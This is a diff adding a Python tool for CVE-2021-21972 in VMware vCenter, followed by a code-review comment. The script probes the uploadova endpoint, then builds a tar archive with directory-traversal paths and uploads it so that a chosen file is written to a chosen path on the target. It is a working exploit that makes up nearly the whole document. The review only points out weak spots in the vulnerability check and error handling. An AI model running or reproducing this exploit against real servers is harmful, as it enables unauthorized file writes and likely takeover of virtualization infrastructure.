diff --git a/tools/CVE-2021-21972.py b/tools/CVE-2021-21972.py
new file mode 100644
index 000000000..2541d7a8a
--- /dev/null
+++ b/tools/CVE-2021-21972.py
@@ -0,0 +1,61 @@
+#!/usr/bin/python3
+
+import argparse
+import requests
+import tarfile
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'
+
+def check(ip):
+ r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
+ if r.status_code == 405:
+ print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
+ return True
+ else:
+ print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
+ return False
+
+def make_traversal_path(path, level=5, os="unix"):
+ if os == "win":
+ traversal = ".." + "\\"
+ fullpath = traversal*level + path
+ return fullpath.replace('/', '\\').replace('\\\\', '\\')
+ else:
+ traversal = ".." + "/"
+ fullpath = traversal*level + path
+ return fullpath.replace('\\', '/').replace('//', '/')
+
+def archive(file, path, os):
+ tarf = tarfile.open('exploit.tar', 'w')
+ fullpath = make_traversal_path(path, level=5, os=os)
+ print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
+ tarf.add(file, fullpath)
+ tarf.close()
+ print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')
+
+def post(ip):
+ r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
+ if r.status_code == 200 and r.text == 'SUCCESS':
+ print('[+] File uploaded successfully')
+ else:
+ print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
+ print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text)
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
+ parser.add_argument('-f', '--file', help='The file to tar')
+ parser.add_argument('-p', '--path', help='The path to extract the file to on target')
+ parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
+ args = parser.parse_args()
+
+ vulnerable = check(args.target)
+ if vulnerable and (args.file and args.path and args.operating_system):
+ archive(args.file, args.path, args.operating_system)
+ post(args.target)
+
+
+
+
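Review bot: `check()` turns a single status code into a verdict, and its `else` branch prints "not vulnerable" for every response other than 405, so a 5xx from a service that is still starting or an error page from a proxy in front of the host would be recorded as a clean result. For anyone using this to confirm patch status that false negative is the costly one; I would report only the expected negative codes as not vulnerable and everything else as inconclusive, e.g. `print('[?] ' + ip + ' inconclusive, response code: ' + str(r.status_code) + '.')`, and word the 405 case as "appears vulnerable", since the GET never exercises the upload handler. `requests.get` is also called outside any `try`, so a timeout or refused connection ends the run with a traceback instead of a result; catching `requests.exceptions.RequestException` and returning `False` with a message would fix that. Because `verify=False` is set, the answer is not tied to the host's certificate either, which deserves a comment next to the call.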